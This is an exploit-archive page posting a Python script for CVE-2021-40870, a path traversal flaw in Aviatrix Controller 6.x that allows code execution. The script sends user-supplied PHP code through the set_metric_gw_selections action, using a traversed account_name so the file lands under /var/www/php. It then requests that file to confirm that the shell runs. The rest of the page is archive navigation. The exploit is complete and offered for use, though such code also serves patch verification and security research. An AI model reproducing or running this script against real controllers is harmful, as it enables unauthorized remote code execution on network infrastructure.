Aviatrix Controller 6.x Path Traversal / Code Execution

Aviatrix Controller 6.x Path Traversal / Code Execution: Posted Oct 11, 2021; Authored by 0xJoyGhosh; Aviatrix Controller versions 6.x prior to 6.5-1804.1922 shell upload exploit that leverages a directory traversal vulnerability.; tags | exploit, shell; advisories | CVE-2021-40870; SHA-256 | 331dd6f8a249dbbec912d81e1ec79077faa3eae730bcac5470378fd810088b1f; Download | Favorite | View

Aviatrix Controller 6.x Path Traversal / Code Execution

#!/usr/bin/env python3
import requests
from requests.structures import CaseInsensitiveDict
from colorama import Fore, Style
import argparse
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
print(f"""

░█▀▀█ ░█──░█ ░█▀▀▀ ── █▀█ █▀▀█ █▀█ ▄█─ ── ─█▀█─ █▀▀█ ▄▀▀▄ ▄▀▀▄ █▀▀█
░█─── ─░█░█─ ░█▀▀▀ ▀▀ ─▄▀ █▄▀█ ─▄▀ ─█─ ▀▀ █▄▄█▄ █▄▀█ ▄▀▀▄ █▄▄─ █▄▀█
░█▄▄█ ──▀▄▀─ ░█▄▄▄ ── █▄▄ █▄▄█ █▄▄ ▄█▄ ── ───█─ █▄▄█ ▀▄▄▀ ▀▄▄▀ █▄▄█
                            Author : 0xJoyGhosh
                            Org    : System00 Security
                            Twitter: @0xjoyghosh

""")
try:
    parser = argparse.ArgumentParser()
    parser.add_argument("-u", "--url", help="Enter Target Url With scheme Ex: -u https://avaitix.target.com", type=str)
    parser.add_argument("-c", "--code", help="Enter php code Ex: -c '<?php phpinfo(); ?>' ", type=str)
    parser.add_argument("-n", "--name", help="Enter php code Ex: -n 'filename' ", type=str)
    args = parser.parse_args()
    url =f"{args.url}/v1/backend1"
except TypeError:
    print("Type -h To See all the options")
except():
    exit()
def exploit(url,path,code):
    headers = CaseInsensitiveDict()
    headers["Content-Type"] = "application/x-www-form-urlencoded"
    data = f'CID=x&action=set_metric_gw_selections&account_name=/../../../var/www/php/{path}.php&data={code}'
    resp = requests.post(url, headers=headers, data=data,verify=False)
    stat = requests.get(f"{args.url}/v1/{path}",verify=False)
    if resp.status_code==200:
        if stat.status_code==200:
            print(f"[ {Fore.RED} Exploited {Fore.BLACK}] [{Fore.GREEN}{args.url}/v1/{path}{Fore.BLACK} ]")
            print("")
        else:
            print("[ Exploit successful Creating File Failed ]")
            pass
    else:
        print(f'[{Fore.BLUE} Exploit Unsuccessful {Fore.BLUE}]')

if args.url is not None:
    if args.code is not None:
        if args.name is not None:
            exploit(url,args.name,args.code)
        else:
            print('Type -h to see help Menu')
    else:
        print('Type -h to see help Menu')
else:
    print('Type -h to see help Menu')

Top Authors In Last 30 Days

Red Hat 217 files
Ubuntu 101 files
Debian 23 files
Gentoo 23 files
tmrswrr 8 files
Amit Roy 4 files
Google Security Research 3 files
Furkan Eren Tetik 3 files
Aslam Anwar Mahimkar 3 files
ron190 3 files

File Archives

Systems

AIX (429)
Apple (2,090)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,074)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,523)
HPUX (880)
iOS (376)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,242)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,193)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,636)
UNIX (9,424)
UnixWare (187)
Windows (6,665)
Other

Aviatrix Controller 6.x Path Traversal / Code Execution

Aviatrix Controller 6.x Path Traversal / Code Execution

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Aviatrix Controller 6.x Path Traversal / Code Execution

Share This

Aviatrix Controller 6.x Path Traversal / Code Execution

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems